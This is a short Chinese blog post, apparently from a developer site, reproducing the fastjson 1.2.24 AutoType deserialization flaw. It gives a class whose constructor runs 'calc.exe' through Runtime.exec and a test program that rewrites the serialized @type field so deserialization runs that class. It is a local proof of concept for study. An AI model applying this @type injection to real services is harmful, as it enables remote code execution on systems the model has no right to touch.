fastJson1.2.24漏洞复现

背景

fastJson在1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。
而作怪的就是这个AutoType

恶意类

public class Attack {

    public Attack() {
        try {
        	 //打开本地计算器
            String commands = "calc.exe";
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

测试类

public class Main {

    public static void main(String[] args) {

        Map<String,String> parent = new HashMap<>();
        parent.put("name","123");

        String parentStr = JSON.toJSONString(parent, SerializerFeature.WriteClassName);
        System.out.println("json序列化后:===>"+parentStr);
        //模拟劫持
        parentStr = hijacked(parentStr);
        System.out.println("json被劫持后:===>"+parentStr);
        System.out.println("反序列化成功:"+JSON.parseObject(parentStr));;
    }

    //模拟修改序列化的type
    private static String hijacked(String json) {
        String[] split = json.split(",");
        split[0] = split[0].substring(0,split[0].indexOf(":")+2) + "com.mytest.tt.Attack\"";
        StringBuilder sb = new StringBuilder();
        for (String s : split) {
            sb.append(s);
            sb.append(",");
        }
        return sb.substring(0,sb.length()-1);
    }
}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值